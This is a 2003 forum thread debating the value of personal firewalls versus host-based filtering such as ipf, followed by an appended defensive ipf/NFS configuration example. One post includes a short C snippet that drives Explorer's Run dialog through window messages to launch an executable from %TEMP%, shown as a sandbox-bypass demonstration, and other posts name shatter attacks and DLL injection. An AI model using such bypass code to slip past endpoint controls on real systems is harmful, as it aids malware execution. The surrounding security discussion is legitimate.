A firewall won't stop this one

Discussion in 'Computer Security' started by NetUser, Nov 1, 2003.

  1. NetUser

    Volker Birk Guest

    OK, why not?

    A discussion about definition and terms does not make sense.

    Volker Birk, Nov 5, 2003

  2. NetUser

    Volker Birk Guest

    I do not agree with Fefe about dropping Windows everywhere.
    I just agree with him about the "worth" of "Personal Firewalls".

    But, you're asking, so I'm trying to answer: Fefe prefers Linux.
    Oh, Fefe also does not like the BSDs very much because of the problems
    of the BSD license. But since his last networking benchmarks, he is
    talking better about FreeBSD and NetBSD than before.
    No. What he says is the point:

    "You can't improve security of an untrusted system by installing another
    untrustworthy piece of software."

    And that is a very good point I guess. Think about it.
    No, of course not.
    I agree.
    No, it doesn't. You're entrapped by a popular logic error.
    Security is a matter of trust. What is more trustworthy, a piece
    of software where you can see the design flaws for yourself, but
    no-one can see where they come from because no-one has the source,
    or a piece of software whose code is open to the world and you
    know some trustworthy people are reviewing the code and reporting
    all security flaws they find?
    Of course, If you want to have a proven correct source, you have
    to prove that code for correctness. All unproved code is not proven
    to be correct. Sounds like a tautology ;-)
    You're right.
    You're wrong, Fefe does that professionally.
    Sorry, you're wrong again.
    Of course he claims that very polemically ;-) But that should not
    lead you to ignore what he's trying to say.

    Volker Birk, Nov 5, 2003

  3. You're absolutely lost. I wish you well... for everyone else, I'd take
    anything this person says with a grain of salt and place his words just
    above the shelf labeled "Tracker".

    Colonel Flagg

    Privacy at a click:

    Q: How many Bill Gates does it take to change a lightbulb?
    A: None, he just defines Darkness™ as the new industry standard..."

    "...I see stupid people."
    Colonel Flagg, Nov 6, 2003

  4. yea, like that made any sense what-so-ever.

    Colonel Flagg
    Colonel Flagg, Nov 6, 2003
  5. A hardware firewall is just a dedicated box running firewall software,
    it is not the opposite, it is the same thing.
    I'm not a huge fan of personal firewalls, but not for the reasons you
    claim, anyway the better ones are firewalls.
    So you run no Cisco PIX, Gauntlet, Checkpoint, etc. firewalls? They are
    all software you cannot check the code for.
    Huh? No, you just opened a door to them, you did not guarantee a
    Or any firewall. An IPTABLES flaw could compromise the Linux box it runs
    on, a PIX flaw could compromise the network appliance, a Gauntlet flaw
    could compromise the Windows box it runs on.
    Some do.
    While I don't like many personal firewalls, some can and do control this
    as well or better than IPF, iptables, pix, etc.

    Anyway, a layered security approach for critical systems involves, among
    many other things, a network level firewall, proper patching, and host
    based firewall (ice. personal firewall).

    Stephen K. Gielda, Nov 6, 2003
  6. NetUser

    Volker Birk Guest

    Hm... you're very impolite. But what should one expect from a person
    who does full-quoting just to offend?

    Better try to find arguments for your position.

    Volker Birk, Nov 6, 2003
  7. NetUser

    Volker Birk Guest

    No, I don't.
    Cisco PIX is a hardware firewall.
    Yes, of course, because iptables is host based filtering.

    But don't you understand the difference between compromising the box
    the firewall is implemented on, and compromising the boxes where the
    user's data and programs are?
    OK, give an example. I'm missing the "Personal Firewall" which does
    sandboxing by implementing virtual machines for the processes.
    You don't understand the point I guess.
    Maybe your opinion.

    Volker Birk, Nov 6, 2003
  8. No, it is dedicated hardware running a software firewall called IOS.
    All firewalls are implemented in software, some just run on dedicated
    So it cannot be a dedicated box running as a network firewall? Hint:
    Yes, it can and it is a popular config.
    That was not what you said, you said disallow unknown from requesting
    information from unknown, anyway, regardless, look at the latest Tiny
    From what I can see no one understands your point. You seem to be stuck
    in this "Personal firewalls are zonealarm or black ice" mode without
    knowing much about setups other than windows. You seem to advocate a
    network firewall and a patched host and shutting down unneeded services
    as all the security you need. You seem to think that hardware can
    actually operate as a firewall without software (ie. the statements
    about how hardware firewalls are the opposite of software firewalls).
    Yes, I don't understand those points and you don't appear to understand
    the subject.

    BTW: ice was a spell check error, that was supposed to read ie, I don't
    want anyone to think I advocate black ice.
    And most others too, pretty much everyone I've met in the field who
    knows their stuff. Layered security involves many pieces, very
    important is the local access control as well as HIDS/LIDS/etc. They
    also play an important role in a bastion host. Yes patching and
    shutting off unneeded services play a role too, but unlike your stance,
    they aren't the end all. Many times local firewalls like IPF are very
    important to help limit access to services just to the machines that
    require access, even when they are all on the same network inside the
    firewall, for example NFS mounts.

    Stephen K. Gielda, Nov 6, 2003
  9. NetUser

    Volker Birk Guest


    IOS is an operating system from Cisco, which runs on their routers
    and switches.

    Cisco PIX products usually do not run IOS.
    No. It is possible to implement filtering in hardware also.
    Some, yes.
    Oh yes, it can. Why not?
    Read my postings again, please. You missed the point.
    #include <windows.h>

    int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrevInst,
                       LPSTR lpCmdLine, int nCmdShow)
    {
        HWND runas, combobox;
        /* the taskbar window of Explorer owns the Win+R hotkey */
        HWND explorer = FindWindowA("Shell_TrayWnd", NULL);

        /* 0x520008 = MAKELPARAM(MOD_WIN, 'R'): tell Explorer Win+R was pressed */
        PostMessageA(explorer, WM_HOTKEY, 0x1f4, 0x520008);
        /* wait until Explorer has opened the "Run" dialog (dialog class #32770) */
        while ((runas = FindWindowA("#32770", "Run")) == NULL)
            Sleep(50);
        combobox = FindWindowExA(runas, NULL, "ComboBox", NULL);
        /* it is Explorer, not this process, that now holds the path to launch */
        SendMessageA(combobox, WM_SETTEXT, 0, (LPARAM) "%TEMP%\\BadProg.exe");
        return 0;
    }

    Which program may I start for you? A self made one in %TEMP%
    would be OK? ;-)
    Oh yes, there is hardware without software, of course. Not every computer
    is a von Neumann machine.

    Volker Birk, Nov 6, 2003
  10. Then what do they run?
    Which network firewall does this?
    Cute snipping of the part where I said "Hint: Yes, it can and it is a
    popular config."
    Cute snipping again. Anyway, FreeBSD and IPF can do virtual machine
    Tiny won't allow that to run properly configged and sandboxed, so the
    code is moot.
    Again, name a current firewall that is only hardware.

    Stephen K. Gielda, Nov 6, 2003
  11. NetUser

    Volker Birk Guest

    Since I'm not using such products, I don't know. Sorry.
    Sorry, I don't understand your point. I never disagreed with that.
    Yes, they can. But not for Windows machines. Of course, vmware exists.
    The point was: no "Personal Firewall" implements virtual machines.
    I don't think so - have you tried that? Of course the point is not
    to deny running that single program. You can use similar code wherever
    you want, i.e. in every program which supports VBA, in every program
    which is not resistant to a shatter attack and so on.

    This "sandbox" is worthless. And this type of breaking out is only
    one of many.
    I'm sorry, I do not use one, and I will not unless there is such
    an implementation which is OpenSource.

    Volker Birk, Nov 6, 2003
  12. You've written in so many circles, you should change your name to

    Colonel Flagg
    Colonel Flagg, Nov 6, 2003
  13. NetUser

    Volker Birk Guest

    What are you trying to tell me?

    Volker Birk, Nov 6, 2003
  14. As I said, it's dedicated hardware running a software firewall.
    Neither do I, which was the point. All current firewalls that I know
    are hardware running a software firewall.
    My point was any firewall flaw could compromise the box it is running
    on, either dedicated or host based.

    To recap:

    Yes, of course, because iptables is host based filtering.
    FreeBSD and IPF can be considered a personal firewall when run host
    based, it can implement virtual machines therefore your statement is
    false. To make your statement true it should read "no windows based
    Personal Firewall" implements virtual machines."

    Tiny will not run any unapproved exe, nor give mem or disk access to
    unapproved processes when properly configged.
    Only approved programs, but again you are only speaking windows here
    while mostly making general statements.
    No, it is not worthless. It is a level of added security that does not
    exist without it.
    Opensource hardware firewall? If it's hardware only there is no source

    You've been claiming host based firewalls are worthless, I have been
    saying they are a piece of the security layer and added value, hence not

    Stephen K. Gielda, Nov 6, 2003
  15. NetUser

    Volker Birk Guest

    OK, different definition of terms again. I would not call everything
    which implements host based filtering a "Personal Firewall".

    But if you're trying to secure a host with host based filtering,
    and that software contains a security flaw which can be exploited,
    that host based filtering does make your host insecure but not secure.

    I never heard of such an exploit in ipf BTW. The only one I remember
    is the problem with kernel based ftp gatewaying - of course one
    could connect to ports other than 21 on the gatewaying machine. But
    that was clear, because FTP features that, and nobody I know has ever
    used it.
    As our definitions differ, I agree with your statement here.
    But: ipf does not implement virtual machines.

    Perhaps you're referencing jail() as in FreeBSD 5? That is not a
    virtual machine concept. VM concepts include vmware, UML, MoL, vserver.
    The only VM for a 4.4BSDlite I know is Plex86. But test it, you then
    don't want to use it.

    jail() is a kernel based sandbox concept for processes, and that
    is a possible option if _every_ function of the kernel supports that.

    So if a kernel supports such a feature natively, and it is no
    "add on", it will work.
    You saw what I did? I did not run an executable. I just told the Windows
    Explorer to do things for me.

    Of course we could also code a shatter attack, shall we? Then no extra
    process is needed. Or we just use a DLL, so no extra process is needed.

    But I even doubt the security of Tiny for denying new processes
    if they're not modifying the kernel heavily.
    By talking about "Personal Firewalls" usually I'm talking about
    Windows. I know such products for MacOS X also, but there they're
    extra ridiculous, because you have ipfw.
    You never saw VHDL code, did you?
    No, I did not. I said, host based filtering does not implement a firewall.
    And host based filtering can be useful, if it is not badly implemented.
    All "Personal Firewalls" I know implement it very badly.

    Sandboxes for processes usually need a VM concept or they're ridiculous.
    The exception is the FreeBSD kernel - with jail() it offers an alternative
    for sandboxing processes by implementing the needed functionality
    throughout the whole kernel code.

    Volker Birk, Nov 6, 2003
  16. NetUser

    Volker Birk Guest

    Volker Birk, Nov 6, 2003
  17. Colonel Flagg, Nov 7, 2003
  18. That depends. For example, I have a network firewall, layered security,
    and my hosts are bastion. On top of that I implement IPF on each host
    for further access control to limit NFS, etc. I consider that more
    secure than not running IPF because without IPF every host on my network
    can exploit new portmapper exploits as they appear. With IPF it limits
    my exposure.
    Yes, but that code to get exploder to run that app in a combo box call
    will not get executed if tiny is set up properly. Though I agree
    shatter or DLL injection is possible, but much more difficult than
    without tiny.
    I used to work for Viewlogic. Verilog, Verisim, etc are software.
    You said above in this post that "host based filtering does make your
    host insecure but not secure." I am saying that host based filtering is
    one of those security layers that makes you more resistant to attack and
    compromise, therefore you are more secure with it than without it. It's
    a layer of access control that does not exist without it. For example,
    my NFS servers are more difficult to compromise for anyone on my local
    net with IPF further controlling access than without. That is an added
    layer and worthwhile one.

    The same goes for products like Tiny on Windows. They add a level of
    control that does not exist without them. Without something policing
    mem, disk, program execution, etc access DLL injection is trivial, with
    it it is more difficult, that means it is more secure with it than
    without. Same goes for remote buffer overflows, if your network is
    compromised and no host based filtering is implemented it is easier for
    someone to compromise your hosts than if you had further access control
    via port filtering that only allowed specific hosts rather than all.
    Again, that is a worthwhile added layer.

    Stephen K. Gielda, Nov 7, 2003
  19. NetUser

    Volker Birk Guest

    Before I condescend to you, I'm better adding you to my killfile.


    Volker Birk, Nov 7, 2003
  20. NetUser

    Volker Birk Guest

    Hm... with NFS in this sentence I find it difficult to talk about
    security at all ;-)
    For that you're right - but IPF never had such an exploit and I cannot
    see how that should work for now. I must repeat it: I'm not arguing
    against any host based filtering. Not at all. My point were the so
    called "Personal Firewalls", which you find mainly on Windows systems.
    Of course it will not - this box executes by using ShellExecute, and
    the shell functions they will have superseded. You even can supersede
    them by using Windows' Policies, as we both know.

    What I tried to point to is the fact that with the messaging system
    you can force the allowed applications to do for you what your
    "Personal Firewall" tries to deny for your process. So you're bypassing
    any "sandbox".

    And there are many ways to bypass the "sandbox". Shatter attacks,
    doing system calls without using system libraries, adding Explorer
    extensions, etc.
    Why? I cannot see that.
    Then you should know that there is source code for hardware.
    If you want OpenSource-Hardware, have a look at http://www.opencores.org/
    Sorry, that is a misunderstanding. I just meant that adding untrustworthy
    code to an untrustworthy system does not add security.

    ipf is another thing. By using ipf on FreeBSD you're not adding code at
    all - it's already in the kernel.

    And a FreeBSD kernel is not an untrustworthy system for what I can see.
    Hm... I think the problem with NFS is that it is insecure by design.
    I cannot see how ipf could help there.
    Sorry, no. Not at all. If you're only doing port filtering, nothing
    changes. There is no difference in that a port is closed by a port
    filter or by not having a listening process at that port. So not
    starting processes which listen on that ports does the same job. It
    does that job even better.

    The only point for port filtering could be, that some addresses in
    your network may use a service and some may not. Then, when a daemon
    does not support that, port filtering can help. But NFS daemons all
    support that BTW.

    I'm not only arguing against "Personal Firewalls", I must repeat.
    I also showed alternatives, i.e. the scripts for which I posted
    links here, which stop Windows from having so many unwanted services.

    Volker Birk, Nov 7, 2003
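The two positions above (Gielda: ipf on each host limits who can reach portmapper and NFS; Birk: the NFS daemons can restrict clients themselves, and a filtered port is no safer than a port nobody listens on) can be written down side by side. The following is an added example and not configuration posted by either participant; the interface name fxp0, the server address 192.0.2.1, the client addresses 192.0.2.10 and 192.0.2.11, and the export path are assumed for illustration. The ipf syntax is that of IPFilter on FreeBSD 4.x as discussed in the thread.

```conf
# --- /etc/exports on the NFS server (assumed host names/paths) -----------
# The daemon-level restriction Birk refers to: mountd only honours mount
# requests for these two clients. This does nothing for portmapper (111),
# which still answers rpcinfo/dump requests from any host on the LAN.
/export/home -maproot=nobody 192.0.2.10 192.0.2.11

# --- /etc/ipf.rules on the same server (assumed addresses) ---------------
# Gielda's layer: the kernel filter decides which hosts may even talk to
# portmapper and nfsd, so a portmapper bug is reachable from two clients
# instead of from every host inside the network firewall.

# Weak variant (what the server looks like with no host filter at all):
# pass in quick on fxp0 all

# Hardened variant: default deny and log, then open only what is needed.
pass in quick on lo0 all
pass out quick on fxp0 keep state all

# portmapper, tcp and udp, from the two NFS clients only
pass in quick on fxp0 proto tcp from 192.0.2.10/32 to 192.0.2.1/32 port = 111 flags S keep state
pass in quick on fxp0 proto udp from 192.0.2.10/32 to 192.0.2.1/32 port = 111 keep state
pass in quick on fxp0 proto tcp from 192.0.2.11/32 to 192.0.2.1/32 port = 111 flags S keep state
pass in quick on fxp0 proto udp from 192.0.2.11/32 to 192.0.2.1/32 port = 111 keep state

# nfsd (2049) from the same two clients
pass in quick on fxp0 proto tcp from 192.0.2.10/32 to 192.0.2.1/32 port = 2049 flags S keep state
pass in quick on fxp0 proto udp from 192.0.2.10/32 to 192.0.2.1/32 port = 2049 keep state
pass in quick on fxp0 proto tcp from 192.0.2.11/32 to 192.0.2.1/32 port = 2049 flags S keep state
pass in quick on fxp0 proto udp from 192.0.2.11/32 to 192.0.2.1/32 port = 2049 keep state

# ssh for administration from one management host (assumed 192.0.2.5)
pass in quick on fxp0 proto tcp from 192.0.2.5/32 to 192.0.2.1/32 port = 22 flags S keep state

# everything else arriving on fxp0, including rpcinfo -p from other LAN
# hosts, is dropped and logged
block in log on fxp0 all
```

Two practical caveats follow from the thread itself. First, mountd and the lock/status daemons bind to ports handed out by portmapper at start-up, so a rule set like this only holds if those daemons are pinned to fixed ports (FreeBSD's mountd accepts a fixed port via its -p flag; check your own version) and those ports get rules of their own. Second, the rule set does not make NFS authentication any stronger: a client at 192.0.2.10 that is itself compromised, or an attacker who can spoof that address on the segment, still reaches the export, which is the design weakness Birk points at.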
